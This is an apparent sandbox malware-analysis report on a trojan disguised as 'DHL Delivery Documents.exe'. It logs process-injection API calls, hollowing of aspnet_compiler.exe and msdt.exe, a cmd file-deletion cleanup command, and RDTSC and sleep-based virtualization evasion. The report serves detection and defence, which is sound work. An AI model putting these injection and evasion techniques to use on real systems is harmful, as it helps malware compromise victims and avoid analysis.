          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03148720 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031487D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031486A0 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031485F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314871A NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031487CA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314869F NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314869A NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031485EC NtCreateFile,
          Source: DHL Delivery Documents.exeStatic PE information: No import functions for PE file found
          Source: DHL Delivery Documents.exeBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297172945.0000000001360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297081764.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBNCXGAS.exe0 vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297200414.000000000139A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeBinary or memory string: OriginalFilenameBNCXGAS.exe0 vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DHL Delivery Documents.exeVirustotal: Detection: 30%
          Source: DHL Delivery Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL Delivery Documents.exe "C:\Users\user\Desktop\DHL Delivery Documents.exe"
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL Delivery Documents.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@1/1
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: DHL Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL Delivery Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DHL Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msdt.pdbGCTL source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: BNCXGAS.pdb source: DHL Delivery Documents.exe
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbBSJB source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmp, DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: msdt.exe, 0000000C.00000002.620930532.0000000005987000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000C.00000002.596381462.0000000003775000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: DHL Delivery Documents.exe, BNCXGAS/Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C805 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B832 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B83B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B8D3 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B89C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C130 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C235 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C367 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C31E push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040D438 push es; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00414F52 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B7E5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0144D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C31E push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C367 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C281 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C130 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C805 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B832 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B83B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B89C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B8D3 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03144F52 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B7E5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0313D438 push es; retf
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000003138614 second address: 000000000313861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000031389AE second address: 00000000031389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe TID: 2228Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe TID: 6792Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 6.3 %
          Source: C:\Windows\SysWOW64\msdt.exeAPI coverage: 6.5 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.309195507.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000008.00000000.323844313.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.323844313.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000008.00000000.301405872.0000000000C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: DHL Delivery Documents.exe, 00000002.00000002.297292575.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2073 mov eax, dword ptr fs:[00000030h]
